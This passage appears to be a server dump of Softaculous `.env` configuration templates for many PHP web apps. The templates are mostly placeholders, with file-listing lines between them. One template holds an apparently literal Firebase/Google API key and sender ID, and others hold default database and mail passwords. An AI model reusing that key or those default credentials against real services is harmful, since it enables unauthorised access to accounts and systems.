REDIS_PASSWORD=null REDIS_PORT=6379 MAIL_DRIVER=smtp MAIL_HOST=maildev MAIL_PORT=1025 MAIL_USERNAME= MAIL_PASSWORD= MAIL_ENCRYPTION= AWS_ACCESS_KEY_ID= AWS_SECRET_ACCESS_KEY= AWS_DEFAULT_REGION=us-east-1 AWS_BUCKET= PUSHER_APP_ID= PUSHER_APP_KEY= PUSHER_APP_SECRET= PUSHER_APP_CLUSTER=mt1 MIX_PUSHER_APP_KEY="${PUSHER_APP_KEY}" MIX_PUSHER_APP_CLUSTER="${PUSHER_APP_CLUSTER}" DEFAULT_DATEPICKER_SEPERATOR="-" DEFAULT_DATEPICKER_FORMAT="yyyy-MM-dd HH:mm" DEFAULT_DATETIME_FORMAT="Y-m-d H:i" APP_TIMEZONE= MAIL_FROM_ADDRESS=testing@attendize.com MAIL_FROM_NAME=testing_service WKHTML2PDF_BIN_FILE=wkhtmltopdf-amd64 GOOGLE_ANALYTICS_ID= GOOGLE_MAPS_GEOCODING_KEY= CAPTCHA_IS_ON=false CAPTCHA_TYPE= CAPTCHA_KEY= CAPTCHA_SECRET= TWITTER_WIDGET_ID= LOG=errorlog DB_TYPE=mysql -rw-r--r-- 1 root root 1372 Oct 7 02:16 /var/softaculous/bagisto/.env APP_NAME=[[site_name]] APP_ENV=production APP_KEY=[[APP_KEY]] APP_DEBUG=false APP_DEBUG_ALLOWED_IPS= APP_URL=[[softurl]]/public APP_ADMIN_URL=admin APP_TIMEZONE=America/New_York APP_LOCALE=en APP_FALLBACK_LOCALE=en APP_FAKER_LOCALE=en_US APP_CURRENCY=USD APP_MAINTENANCE_DRIVER=file BCRYPT_ROUNDS=12 LOG_CHANNEL=stack LOG_STACK=single LOG_DEPRECATIONS_CHANNEL=null LOG_LEVEL=debug DB_CONNECTION="mysql" DB_HOST="[[softdbhost]]" DB_PORT="3306" DB_DATABASE="[[softdb]]" DB_USERNAME="[[softdbuser]]" DB_PASSWORD="[[softdbpass]]" DB_PREFIX= SESSION_DRIVER=file SESSION_LIFETIME=120 SESSION_ENCRYPT=false SESSION_PATH=/ SESSION_DOMAIN=null BROADCAST_CONNECTION=log FILESYSTEM_DISK=public QUEUE_CONNECTION=sync CACHE_STORE=file CACHE_PREFIX= MEMCACHED_HOST=127.0.0.1 REDIS_CLIENT=phpredis REDIS_HOST=127.0.0.1 REDIS_PASSWORD=null REDIS_PORT=6379 RESPONSE_CACHE_ENABLED=true MAIL_MAILER=smtp MAIL_HOST=[[out_host_server]] MAIL_PORT=[[out_m_port]] MAIL_USERNAME= MAIL_PASSWORD= MAIL_ENCRYPTION=tls MAIL_FROM_ADDRESS=shop@example.com MAIL_FROM_NAME=Shop ADMIN_MAIL_ADDRESS=admin@example.com ADMIN_MAIL_NAME=Admin CONTACT_MAIL_ADDRESS= CONTACT_MAIL_NAME= AWS_ACCESS_KEY_ID= AWS_SECRET_ACCESS_KEY= AWS_DEFAULT_REGION=us-east-1 AWS_BUCKET= AWS_USE_PATH_STYLE_ENDPOINT=false VITE_APP_NAME=[[site_name]] VITE_HOST=localhost VITE_PORT= -rw-r--r-- 1 root root 2581 Mar 22 2024 /var/softaculous/castopod/.env app.baseURL="[[softurl]]/" media.baseURL="[[softurl]]/" admin.gateway="cp-admin" auth.gateway="cp-auth" analytics.salt="[[analytics_salt]]" database.default.hostname="[[softdbhost]]" database.default.database="[[softdb]]" database.default.username="[[softdbuser]]" database.default.password="[[softdbpass]]" database.default.DBPrefix="[[dbprefix]]" email.fromEmail="[[send_email]]" email.SMTPHost="[[out_host_server]]" email.SMTPUser="[[send_email]]" email.SMTPPass="[[send_email_pwd]]" email.SMTPPort="[[out_m_port]]" email.SMTPCrypto="[[out_ssl]]" cache.handler="file" -rw-r--r-- 1 root root 110 Mar 4 2025 /var/softaculous/contao/.env.local APP_SECRET=[[app_secret]] DATABASE_URL=mysql://[[softdbuser]]:'[[softdbpass]]'@[[softdbhost]]:3306/[[softdb]] -rw-r--r-- 1 root root 1155 Jun 19 2025 /var/softaculous/eventsch/.env APP_NAME=Laravel APP_ENV=production APP_KEY=[[key]] APP_DEBUG=false APP_TIMEZONE=UTC APP_URL="[[softurl]]/public" REPORT_ERRORS=false APP_LOCALE=en APP_FALLBACK_LOCALE=en APP_FAKER_LOCALE=en_US APP_MAINTENANCE_DRIVER=file BCRYPT_ROUNDS=12 LOG_CHANNEL=stack LOG_STACK=single LOG_DEPRECATIONS_CHANNEL=null LOG_LEVEL=debug DB_CONNECTION=mysql DB_HOST="[[softdbhost]]" DB_PORT=3306 DB_DATABASE="[[softdb]]" DB_USERNAME="[[softdbuser]]" DB_PASSWORD="[[softdbpass]]" SESSION_DRIVER=file SESSION_LIFETIME=120 SESSION_ENCRYPT=false SESSION_PATH=/ SESSION_DOMAIN=null BROADCAST_CONNECTION=log FILESYSTEM_DISK=local QUEUE_CONNECTION=database CACHE_STORE=database CACHE_PREFIX= MEMCACHED_HOST=127.0.0.1 REDIS_CLIENT=phpredis REDIS_HOST=127.0.0.1 REDIS_PASSWORD=null REDIS_PORT=6379 MAIL_MAILER=log MAIL_HOST=127.0.0.1 MAIL_PORT=2525 MAIL_USERNAME=null MAIL_PASSWORD=null MAIL_ENCRYPTION=null MAIL_FROM_ADDRESS="hello@example.com" MAIL_FROM_NAME="${APP_NAME}" AWS_ACCESS_KEY_ID= AWS_SECRET_ACCESS_KEY= AWS_DEFAULT_REGION=us-east-1 AWS_BUCKET= AWS_USE_PATH_STYLE_ENDPOINT=false VITE_APP_NAME="${APP_NAME}" GEMINI_API_KEY= -rwxr-xr-x 1 root root 593 Apr 10 2023 /var/softaculous/faveo/.env APP_DEBUG=false APP_BUGSNAG=true APP_URL=[[softurl]]/public APP_KEY=[[APP_KEY]] DB_TYPE=mysql DB_HOST="[[softdbhost]]" DB_PORT="" DB_DATABASE="[[softdb]]" DB_USERNAME="[[softdbuser]]" DB_PASSWORD="[[softdbpass]]" DB_ENGINE=InnoDB MAIL_MAILER=smtp MAIL_HOST=mailtrap.io MAIL_PORT=2525 MAIL_USERNAME=null MAIL_PASSWORD=null CACHE_DRIVER=file SESSION_DRIVER=file SESSION_COOKIE_NAME=[[SESSION_COOKIE_NAME]] QUEUE_CONNECTION=sync JWT_TTL=4 FCM_SERVER_KEY=AIzaSyCyx5OFnsRFUmDLTMbPV50ZMDUGSG-bLw4 FCM_SENDER_ID=661051343223 REDIS_DATABASE=0 DB_INSTALL=1 APP_ENV=production JWT_SECRET=[[JWT_SECRET]] -rw-r--r-- 1 root root 12645 Nov 10 04:53 /var/softaculous/firefly/.env APP_ENV=production APP_DEBUG=false SITE_OWNER=mail@example.com APP_KEY=base64:[[APP_KEY]] DEFAULT_LANGUAGE=[[language]] DEFAULT_LOCALE=equal TZ=Europe/Amsterdam TRUSTED_PROXIES= LOG_CHANNEL=daily APP_LOG_LEVEL=notice AUDIT_LOG_LEVEL=emergency AUDIT_LOG_CHANNEL= PAPERTRAIL_HOST= PAPERTRAIL_PORT= DB_CONNECTION=mysql DB_HOST=[[softdbhost]] DB_PORT=3306 DB_DATABASE=[[softdb]] DB_USERNAME=[[softdbuser]] DB_PASSWORD=[[softdbpass]] DB_SOCKET= MYSQL_USE_SSL=false MYSQL_SSL_VERIFY_SERVER_CERT=true MYSQL_SSL_CAPATH=/etc/ssl/certs/ MYSQL_SSL_CA= MYSQL_SSL_CERT= MYSQL_SSL_KEY= MYSQL_SSL_CIPHER= PGSQL_SSL_MODE=prefer PGSQL_SSL_ROOT_CERT=null PGSQL_SSL_CERT=null PGSQL_SSL_KEY=null PGSQL_SSL_CRL_FILE=null PGSQL_SCHEMA=public CACHE_DRIVER=file SESSION_DRIVER=file REDIS_SCHEME=tcp REDIS_PATH= REDIS_HOST=127.0.0.1 REDIS_PORT=6379 REDIS_USERNAME= REDIS_PASSWORD= REDIS_DB="0" REDIS_CACHE_DB="1" COOKIE_PATH="/" COOKIE_DOMAIN= COOKIE_SECURE=false COOKIE_SAMESITE=lax MAIL_MAILER=log MAIL_HOST=null MAIL_PORT=2525 MAIL_FROM=changeme@example.com MAIL_USERNAME=null MAIL_PASSWORD=null MAIL_ENCRYPTION=null MAIL_SENDMAIL_COMMAND= MAIL_ALLOW_SELF_SIGNED=false MAIL_VERIFY_PEER=true MAIL_VERIFY_PEER_NAME=true MAILGUN_DOMAIN= MAILGUN_SECRET= MAILGUN_ENDPOINT=api.mailgun.net MANDRILL_SECRET= SPARKPOST_SECRET= MAILERSEND_API_KEY= SEND_ERROR_MESSAGE=true SEND_REPORT_JOURNALS=true ENABLE_EXTERNAL_MAP=false ENABLE_EXCHANGE_RATES=false ENABLE_EXTERNAL_RATES=false MAP_DEFAULT_LAT=51.983333 MAP_DEFAULT_LONG=5.916667 MAP_DEFAULT_ZOOM=6 VALID_URL_PROTOCOLS= AUTHENTICATION_GUARD=web AUTHENTICATION_GUARD_HEADER=REMOTE_USER AUTHENTICATION_GUARD_EMAIL= PASSPORT_PRIVATE_KEY= PASSPORT_PUBLIC_KEY= CUSTOM_LOGOUT_URL= DISABLE_FRAME_HEADER=false DISABLE_CSP_HEADER=false TRACKER_SITE_ID= TRACKER_URL= REPORT_ERRORS_ONLINE=false ALLOW_WEBHOOKS=false STATIC_CRON_TOKEN=PLEASE_REPLACE_WITH_32_CHAR_CODE DKR_CHECK_SQLITE=true APP_NAME="[[site_name]]" BROADCAST_DRIVER=log QUEUE_DRIVER=sync CACHE_PREFIX=firefly PUSHER_KEY= IPINFO_TOKEN= PUSHER_SECRET= PUSHER_ID= DEMO_USERNAME= DEMO_PASSWORD= USE_RUNNING_BALANCE=false FIREFLY_III_LAYOUT=v1 QUERY_PARSER_IMPLEMENTATION=new APP_URL=[[softurl]]/public -rw-r--r-- 1 root root 922 Jan 21 2025 /var/softaculous/freescout/.env APP_URL=[[softurl]] SESSION_SECURE_COOKIE=[[SESSION_SECURE_COOKIE]] APP_TIMEZONE=America/New_York APP_LOCALE=[[language]] DB_CONNECTION=mysql DB_HOST=[[softdbhost]] DB_PORT=3306 DB_DATABASE=[[softdb]] DB_USERNAME=[[softdbuser]] DB_PASSWORD="[[softdbpass]]" APP_KEY=[[APP_KEY]] -rw-r--r-- 1 root root 422 Jun 13 2025 /var/softaculous/fusio/.env APP_PROJECT_KEY="[[fusio_project_key]]" APP_ENV=prod APP_DEBUG=false APP_CONNECTION="pdo-mysql://[[softdbuser]]:[[softdbpass]]@[[softdbhost]]/[[softdb]]" APP_MAILER="native://default" APP_MESSENGER="doctrine://default" APP_URL="[[softurl]]/public" APP_APPS_URL="[[softurl]]/public/apps" APP_MAIL_SENDER="" APP_TRUSTED_IP_HEADER="" APP_TENANT_ID="" SDKGEN_CLIENT_ID="" SDKGEN_CLIENT_SECRET="" -rwxr-xr-x 1 root root 1233 Jan 7 2022 /var/softaculous/handesk/.env APP_NAME="[[site_name]]" APP_ENV=local APP_KEY=base64:[[APP_KEY]] APP_DEBUG=true APP_LOG_LEVEL=debug APP_URL=[[softurl]]/public APP_LOCALE=en APP_FALLBACK_LOCALE=en DB_CONNECTION=mysql DB_HOST=[[softdbhost]] DB_PORT=3306 DB_DATABASE=[[softdb]] DB_USERNAME=[[softdbuser]] DB_PASSWORD=[[softdbpass]] BROADCAST_DRIVER=log CACHE_DRIVER=file SESSION_DRIVER=file QUEUE_DRIVER=sync REDIS_HOST=127.0.0.1 REDIS_PASSWORD=null REDIS_PORT=6379 MAIL_DRIVER=smtp MAIL_HOST=smtp.mailtrap.io MAIL_PORT=2525 MAIL_USERNAME=null MAIL_PASSWORD=null MAIL_ENCRYPTION=null MAIL_FETCH_HOST=smtp.yourmail.com MAIL_FETCH_PORT=110 MAIL_FETCH_USERNAME=hello@handesk.com MAIL_FETCH_PASSWORD=secret-password MAIL_FETCH_OPTIONS=/pop3 MAIL_FETCH_USE_SSL=true MAIL_SSLOPTIONS_ALLOW_SELF_SIGNED=false MAIL_SSLOPTIONS_VERIFY_PEER=true MAIL_SSLOPTIONS_VERIFY_PEER_NAME=true PUSHER_APP_ID= PUSHER_APP_KEY= PUSHER_APP_SECRET= ISSUES_DRIVER=bitbucket BITBUCKET_USER=bitbucket-user-if-using-basic-auth BITBUCKET_PASSWORD=bitbucket-password-if-using-basic-auth BITBUCKET_OAUTH_KEY=bitbucket-oauth-key BITBUCKET_OAUTH_SECRET=bitbucket-oauth-secret -rw-r--r-- 1 root root 2427 Apr 8 2024 /var/softaculous/igniter/.env CI_ENVIRONMENT = production app.baseURL = '[[softurl]]/public/' database.default.hostname = [[softdbhost]] database.default.database = [[softdb]] database.default.username = [[softdbuser]] database.default.password = [[softdbpass]] database.default.DBDriver = MySQLi database.default.DBPrefix = [[dbprefix]] database.default.port = 3306 -rw-r--r-- 1 root root 2218 Nov 17 04:15 /var/softaculous/kimai/.env DATABASE_URL=mysql://[[softdbuser]]:[[softdbpass]]@[[softdbhost]]:3306/[[softdb]]?charset=utf8mb4&serverVersion=[[dbser_ver]] MAILER_FROM=kimai@example.com MAILER_URL=null://null APP_ENV=prod APP_SECRET=change_this_to_something_unique CORS_ALLOW_ORIGIN=^https?://localhost(:[0-9]+)?$ -rw-r--r-- 1 root root 1182 Sep 29 05:54 /var/softaculous/krayin/.env APP_NAME=[[site_name]] APP_ENV=prod APP_KEY=[[APP_KEY]] APP_DEBUG=false APP_URL=[[softurl]]/public APP_TIMEZONE=America/New_York APP_LOCALE=en APP_CURRENCY=USD VITE_HOST= VITE_PORT= LOG_CHANNEL=stack LOG_LEVEL=debug DB_CONNECTION=mysql DB_HOST=[[softdbhost]] DB_PORT=3306 DB_DATABASE=[[softdb]] DB_USERNAME=[[softdbuser]] DB_PASSWORD=[[softdbpass]] DB_PREFIX=[[dbprefix]] BROADCAST_DRIVER=log CACHE_DRIVER=file QUEUE_CONNECTION=sync SESSION_DRIVER=file SESSION_LIFETIME=120 MEMCACHED_HOST=127.0.0.1 REDIS_HOST=127.0.0.1 REDIS_PASSWORD=null REDIS_PORT=6379 MAIL_MAILER=smtp MAIL_HOST=mailhog MAIL_PORT=1025 MAIL_USERNAME=null MAIL_PASSWORD=null MAIL_ENCRYPTION=null MAIL_FROM_ADDRESS=laravel@krayincrm.com MAIL_FROM_NAME="${APP_NAME}" MAIL_DOMAIN=webkul.com MAIL_RECEIVER_DRIVER=sendgrid IMAP_HOST=imap.example.com IMAP_PORT=993 IMAP_ENCRYPTION=ssl IMAP_VALIDATE_CERT=true IMAP_USERNAME=your_username IMAP_PASSWORD=your_password AWS_ACCESS_KEY_ID= AWS_SECRET_ACCESS_KEY= AWS_DEFAULT_REGION=us-east-1 AWS_BUCKET= PUSHER_APP_ID= PUSHER_APP_KEY= PUSHER_APP_SECRET= PUSHER_APP_CLUSTER=mt1 MIX_PUSHER_APP_KEY="${PUSHER_APP_KEY}" MIX_PUSHER_APP_CLUSTER="${PUSHER_APP_CLUSTER}" -rw-r--r-- 1 root root 1122 Jan 3 2025 /var/softaculous/laravel/.env APP_NAME=Laravel APP_ENV=local APP_KEY=[[key]] APP_DEBUG=true APP_TIMEZONE=UTC APP_URL=[[softurl]] APP_LOCALE=en APP_FALLBACK_LOCALE=en APP_FAKER_LOCALE=en_US APP_MAINTENANCE_DRIVER=file PHP_CLI_SERVER_WORKERS=4 BCRYPT_ROUNDS=12 LOG_CHANNEL=stack LOG_STACK=single LOG_DEPRECATIONS_CHANNEL=null LOG_LEVEL=debug DB_CONNECTION=mysql DB_HOST=[[softdbhost]] DB_PORT=3306 DB_DATABASE=[[softdb]] DB_USERNAME=[[softdbuser]] DB_PASSWORD=[[softdbpass]] SESSION_DRIVER=database SESSION_LIFETIME=120 SESSION_ENCRYPT=false SESSION_PATH=/ SESSION_DOMAIN=null BROADCAST_CONNECTION=log FILESYSTEM_DISK=local QUEUE_CONNECTION=database CACHE_STORE=database CACHE_PREFIX= MEMCACHED_HOST=127.0.0.1 REDIS_CLIENT=phpredis REDIS_HOST=127.0.0.1 REDIS_PASSWORD=null REDIS_PORT=6379 MAIL_MAILER=log MAIL_SCHEME=null MAIL_HOST=127.0.0.1 MAIL_PORT=2525 MAIL_USERNAME=null MAIL_PASSWORD=null MAIL_FROM_ADDRESS="hello@example.com" MAIL_FROM_NAME="${APP_NAME}" AWS_ACCESS_KEY_ID= AWS_SECRET_ACCESS_KEY= AWS_DEFAULT_REGION=us-east-1 AWS_BUCKET= AWS_USE_PATH_STYLE_ENDPOINT=false VITE_APP_NAME="${APP_NAME}" -rw-r--r-- 1 root root 1131 Jul 26 2024 /var/softaculous/laravel8/.env APP_NAME=Laravel APP_ENV=local APP_KEY=[[key]] APP_DEBUG=true APP_URL=[[softurl]] LOG_CHANNEL=stack LOG_DEPRECATIONS_CHANNEL=null LOG_LEVEL=debug DB_CONNECTION=mysql DB_HOST=[[softdbhost]] DB_PORT=3306 DB_DATABASE=[[softdb]] DB_USERNAME=[[softdbuser]] DB_PASSWORD=[[softdbpass]] BROADCAST_DRIVER=log CACHE_DRIVER=file FILESYSTEM_DISK=local QUEUE_CONNECTION=sync SESSION_DRIVER=file SESSION_LIFETIME=120 MEMCACHED_HOST=127.0.0.1 REDIS_HOST=127.0.0.1 REDIS_PASSWORD=null REDIS_PORT=6379 MAIL_MAILER=smtp MAIL_HOST=mailpit MAIL_PORT=1025 MAIL_USERNAME=null MAIL_PASSWORD=null MAIL_ENCRYPTION=null MAIL_FROM_ADDRESS="hello@example.com" MAIL_FROM_NAME="${APP_NAME}" AWS_ACCESS_KEY_ID= AWS_SECRET_ACCESS_KEY= AWS_DEFAULT_REGION=us-east-1 AWS_BUCKET= AWS_USE_PATH_STYLE_ENDPOINT=false PUSHER_APP_ID= PUSHER_APP_KEY= PUSHER_APP_SECRET= PUSHER_HOST= PUSHER_PORT=443 PUSHER_SCHEME=https PUSHER_APP_CLUSTER=mt1 VITE_APP_NAME="${APP_NAME}" VITE_PUSHER_APP_KEY="${PUSHER_APP_KEY}" VITE_PUSHER_HOST="${PUSHER_HOST}" VITE_PUSHER_PORT="${PUSHER_PORT}" VITE_PUSHER_SCHEME="${PUSHER_SCHEME}" VITE_PUSHER_APP_CLUSTER="${PUSHER_APP_CLUSTER}" -rw-r--r-- 1 root root 9345 Dec 8 02:28 /var/softaculous/lychee/.env APP_NAME=Lychee APP_ENV=production APP_KEY=base64:[[APP_KEY]] APP_DEBUG=false APP_URL=[[app_url]] APP_FORCE_HTTPS=false APP_DIR=[[relativeurl]]/public DEBUGBAR_ENABLED=false LOG_VIEWER_ENABLED=true CLOCKWORK_ENABLE=false REQUIRE_CONTENT_TYPE_ENABLED=true LEGACY_V4_REDIRECT=false DB_OLD_LYCHEE_PREFIX= DB_CONNECTION=mysql DB_HOST=[[softdbhost]] DB_PORT= DB_DATABASE=[[softdb]] DB_USERNAME=[[softdbuser]] DB_PASSWORD="[[softdbpass]]" DB_LOG_SQL=false DB_LOG_SQL_EXPLAIN=false #only for MySQL DB_LIST_FOREIGN_KEYS=false CACHE_DRIVER=file REDIS_HOST=127.0.0.1 REDIS_PASSWORD=null REDIS_PORT=6379 LOG_VIEWER_CACHE_DRIVER=file SESSION_DRIVER=file SESSION_LIFETIME=120 QUEUE_CONNECTION=sync SECURITY_HEADER_HSTS_ENABLE=false SECURITY_HEADER_CSP_CONNECT_SRC= SECURITY_HEADER_SCRIPT_SRC_ALLOW= SECURITY_HEADER_CSP_CHILD_SRC= SECURITY_HEADER_CSP_FONT_SRC= SECURITY_HEADER_CSP_FORM_ACTION= SECURITY_HEADER_CSP_FRAME_ANCESTORS= SECURITY_HEADER_CSP_FRAME_SRC= SECURITY_HEADER_CSP_IMG_SRC= SECURITY_HEADER_CSP_MEDIA_SRC= SESSION_SECURE_COOKIE=false MAIL_DRIVER=smtp MAIL_HOST= MAIL_PORT= MAIL_USERNAME= MAIL_PASSWORD= MAIL_ENCRYPTION= MAIL_FROM_NAME= MAIL_FROM_ADDRESS= TRUSTED_PROXIES=null VITE_PUSHER_APP_KEY="${PUSHER_APP_KEY}" VITE_PUSHER_APP_CLUSTER="${PUSHER_APP_CLUSTER}" -rw-r--r-- 1 root root 1391 Feb 5 2025 /var/softaculous/ninja/.env APP_NAME="Invoice Ninja" APP_ENV=production APP_KEY=[[key]] APP_DEBUG="false" APP_URL="[[protocol]]://[[domhost]]" REACT_URL=http://localhost:3001 DB_CONNECTION="mysql" MULTI_DB_ENABLED=false DB_HOST="[[softdbhost]]" DB_DATABASE="[[softdb]]" DB_USERNAME="[[softdbuser]]" DB_PASSWORD="[[softdbpass]]" DB_PORT="3306" DEMO_MODE=false BROADCAST_DRIVER=log LOG_CHANNEL=stack CACHE_DRIVER=file QUEUE_CONNECTION=sync SESSION_DRIVER=file SESSION_LIFETIME=120 MAIL_MAILER="log" REDIS_HOST=127.0.0.1 REDIS_PASSWORD=null REDIS_PORT=6379 POSTMARK_API_TOKEN= REQUIRE_HTTPS="[[https_enable]]" GOOGLE_MAPS_API_KEY= ERROR_EMAIL= TRUSTED_PROXIES= SCOUT_DRIVER=null NINJA_ENVIRONMENT="selfhost" PDF_GENERATOR=hosted_ninja PHANTOMJS_KEY='a-demo-key-with-low-quota-per-ip-address' PHANTOMJS_SECRET=secret UPDATE_SECRET=[[update_secret]] DELETE_PDF_DAYS=60 DELETE_BACKUP_DAYS=60 COMPOSER_AUTH='{"github-oauth": {"github.com": "${{ secrets.GITHUB_TOKEN }}"}}' GOOGLE_PLAY_PACKAGE_NAME= APPSTORE_PASSWORD= MICROSOFT_CLIENT_ID= MICROSOFT_CLIENT_SECRET= MICROSOFT_REDIRECT_URI= APPLE_CLIENT_ID= APPLE_CLIENT_SECRET= APPLE_REDIRECT_URI= NORDIGEN_SECRET_ID= NORDIGEN_SECRET_KEY= GOCARDLESS_CLIENT_ID= GOCARDLESS_CLIENT_SECRET= OPENEXCHANGE_APP_ID= MAIL_PORT=0 MAIL_ENCRYPTION= MAIL_HOST= MAIL_USERNAME= MAIL_FROM_NAME= MAIL_FROM_ADDRESS= MAIL_PASSWORD= -rwxr-xr-x 1 root root 518 Dec 23 2021 /var/softaculous/ninja4/.env APP_ENV=production APP_DEBUG=false APP_LOCALE=en APP_URL=[[softurl]]/public APP_KEY=[[key]] APP_CIPHER=AES-256-CBC REQUIRE_HTTPS=[[https_enable]] DB_TYPE=mysql DB_HOST=[[softdbhost]] DB_DATABASE=[[softdb]] DB_USERNAME=[[softdbuser]] DB_PASSWORD=[[softdbpass]] MAIL_DRIVER=smtp MAIL_PORT=587 MAIL_ENCRYPTION=tls MAIL_HOST= MAIL_USERNAME= MAIL_FROM_NAME= MAIL_FROM_ADDRESS= MAIL_PASSWORD= PHANTOMJS_CLOUD_KEY=a-demo-key-with-low-quota-per-ip-address PHANTOMJS_SECRET=[[PHANTOMJS_SECRET]] MAILGUN_DOMAIN= MAILGUN_SECRET= -rw-r--r-- 1 root root 3059 Jun 9 2025 /var/softaculous/ospos/.env CI_ENVIRONMENT = production CI_DEBUG = false app.appTimezone = 'UTC' database.default.hostname = '[[softdbhost]]' database.default.database = '[[softdb]]' database.default.username = '[[softdbuser]]' database.default.password = '[[softdbpass]]' database.default.DBDriver = 'MySQLi' database.default.DBPrefix = 'ospos_' database.default.port = 3306 database.development.hostname = 'localhost' database.development.database = 'ospos' database.development.username = 'admin' database.development.password = 'pointofsale' database.development.DBDriver = 'MySQLi' database.development.DBPrefix = 'ospos_' database.development.port = 3306 database.tests.hostname = 'localhost' database.tests.database = 'ospos' database.tests.username = 'admin' database.tests.password = 'pointofsale' database.tests.DBDriver = 'MySQLi' database.tests.DBPrefix = 'ospos_' database.tests.charset = utf8mb4 database.tests.DBCollat = utf8mb4_general_ci database.tests.port = 3306 email.SMTPHost = '' email.SMTPUser = '' email.SMTPPass = '' email.SMTPPort = email.SMTPTimeout = 5 email.SMTPCrypto = 'tls' encryption.key = '[[encryption_key]]' honeypot.hidden = true honeypot.label = 'Fill This Field' honeypot.name = 'honeypot' honeypot.template = '' honeypot.container = '
{template}
' logger.threshold = 0 app.db_log_enabled = false app.db_log_only_long = false -rwxr-xr-x 1 root root 344 Dec 23 2021 /var/softaculous/pyro/.env APP_ENV=local INSTALLED=true APP_KEY=[[app_key]] DB_DRIVER=mysql DB_HOST=[[softdbhost]] DB_DATABASE=[[softdb]] DB_USERNAME=[[softdbuser]] DB_PASSWORD=[[softdbpass]] APPLICATION_NAME=[[site_name]] APPLICATION_DOMAIN=[[domhost]][[relativeurl]]/public APPLICATION_REFERENCE=[[app_ref]] APP_URL=[[softurl]]/public ADMIN_USERNAME=[[admin_username]] -rw-r--r-- 1 root root 312 May 9 2023 /var/softaculous/shopware/.env.local APP_SECRET=[[APP_SECRET]] APP_URL=[[softurl]]/public DATABASE_URL=mysql://[[softdbuser]]:[[softdbpass]]@[[softdbhost]]:3306/[[softdb]] COMPOSER_HOME=[[softpath]]/var/cache/composer INSTANCE_ID=[[instance_id]] BLUE_GREEN_DEPLOYMENT=1 OPENSEARCH_URL=http://localhost:9200 ADMIN_OPENSEARCH_URL=http://localhost:9200 -rw-r--r-- 1 root root 6142 Dec 15 06:21 /var/softaculous/snipeit/.env APP_ENV=production APP_DEBUG=false APP_KEY=[[APP_KEY]] APP_URL=[[softurl]]/public APP_TIMEZONE='UTC' APP_LOCALE='en-US' MAX_RESULTS=500 PRIVATE_FILESYSTEM_DISK=local PUBLIC_FILESYSTEM_DISK=local_public DB_CONNECTION=mysql DB_HOST=[[softdbhost]] DB_SOCKET=null DB_PORT=3306 DB_DATABASE=[[softdb]] DB_USERNAME=[[softdbuser]] DB_PASSWORD=[[softdbpass]] DB_PREFIX=[[dbprefix]] DB_DUMP_PATH='/usr/bin' DB_DUMP_SKIP_SSL=false DB_CHARSET=utf8mb4 DB_COLLATION=utf8mb4_unicode_ci DB_SANITIZE_BY_DEFAULT=false DB_SSL=false DB_SSL_IS_PAAS=false DB_SSL_KEY_PATH=null DB_SSL_CERT_PATH=null DB_SSL_CA_PATH=null DB_SSL_CIPHER=null DB_SSL_VERIFY_SERVER=null MAIL_MAILER=smtp MAIL_HOST=email-smtp.us-west-2.amazonaws.com MAIL_PORT=587 MAIL_USERNAME=YOURUSERNAME MAIL_PASSWORD=YOURPASSWORD MAIL_FROM_ADDR=you@example.com MAIL_FROM_NAME='Snipe-IT' MAIL_REPLYTO_ADDR=you@example.com MAIL_REPLYTO_NAME='Snipe-IT' MAIL_AUTO_EMBED_METHOD='attachment' MAIL_TLS_VERIFY_PEER=true IMAGE_LIB=gd MAIL_BACKUP_NOTIFICATION_DRIVER=null MAIL_BACKUP_NOTIFICATION_ADDRESS=null BACKUP_ENV=true ALLOW_BACKUP_DELETE=false ALLOW_DATA_PURGE=false ALL_BACKUP_KEEP_DAYS=7 DAILY_BACKUP_KEEP_DAYS=16 WEEKLY_BACKUP_KEEP_WEEKS=8 MONTHLY_BACKUP_KEEP_MONTHS=4 YEARLY_BACKUP_KEEP_YEARS=2 BACKUP_PURGE_OLDEST_AT_MEGS=5000 SESSION_DRIVER=file SESSION_LIFETIME=12000 EXPIRE_ON_CLOSE=false ENCRYPT=false COOKIE_NAME=snipeit_session PASSPORT_COOKIE_NAME='snipeit_passport_token' COOKIE_DOMAIN=null SECURE_COOKIES=false API_TOKEN_EXPIRATION_YEARS=15 BS_TABLE_STORAGE=localStorage BS_TABLE_DEEPLINK=true APP_TRUSTED_PROXIES=192.168.1.1,10.0.0.1 ALLOW_IFRAMING=false REFERRER_POLICY=same-origin ENABLE_CSP=false ADDITIONAL_CSP_URLS=null CORS_ALLOWED_ORIGINS=null ENABLE_HSTS=false CACHE_DRIVER=file QUEUE_DRIVER=sync CACHE_PREFIX=snipeit REDIS_HOST=null REDIS_PASSWORD=null REDIS_PORT=null MEMCACHED_HOST=null MEMCACHED_PORT=null PUBLIC_AWS_SECRET_ACCESS_KEY=null PUBLIC_AWS_ACCESS_KEY_ID=null PUBLIC_AWS_DEFAULT_REGION=null PUBLIC_AWS_BUCKET=null PUBLIC_AWS_URL=null PUBLIC_AWS_ENDPOINT=null PUBLIC_AWS_PATH_STYLE=null PUBLIC_AWS_BUCKET_ROOT=null PRIVATE_AWS_ACCESS_KEY_ID=null PRIVATE_AWS_SECRET_ACCESS_KEY=null PRIVATE_AWS_DEFAULT_REGION=null PRIVATE_AWS_BUCKET=null PRIVATE_AWS_URL=null PRIVATE_AWS_ENDPOINT=null PRIVATE_AWS_PATH_STYLE=null PRIVATE_AWS_BUCKET_ROOT=null AWS_ACCESS_KEY_ID=null AWS_SECRET_ACCESS_KEY=null AWS_DEFAULT_REGION=null LOGIN_MAX_ATTEMPTS=5 LOGIN_LOCKOUT_DURATION=60 LOGIN_AUTOCOMPLETE=false RESET_PASSWORD_LINK_EXPIRES=15 PASSWORD_CONFIRM_TIMEOUT=10800 PASSWORD_RESET_MAX_ATTEMPTS_PER_MIN=50 INVITE_PASSWORD_LINK_EXPIRES=1500 LOG_CHANNEL=single LOG_DEPRECATIONS=false LOG_MAX_DAYS=10 APP_LOCKED=false APP_CIPHER=AES-256-CBC APP_FORCE_TLS=false APP_ALLOW_INSECURE_HOSTS=false GOOGLE_MAPS_API= LDAP_MEM_LIM=500M LDAP_TIME_LIM=600 BACKUP_TIME_LIMIT=600 IMPORT_TIME_LIMIT=600 IMPORT_MEMORY_LIMIT=500M REPORT_TIME_LIMIT=12000 API_THROTTLE_PER_MINUTE=120 CSV_ESCAPE_FORMULAS=true LIVEWIRE_URL_PREFIX=[[relativeurl]]/public MAX_UNPAGINATED=5000 REQUIRE_SAML=false SAML_KEY_SIZE=2048 HASHING_DRIVER='bcrypt' BCRYPT_ROUNDS=10 ARGON_MEMORY=1024 ARGON_THREADS=2 ARGON_TIME=2 SCIM_TRACE=false 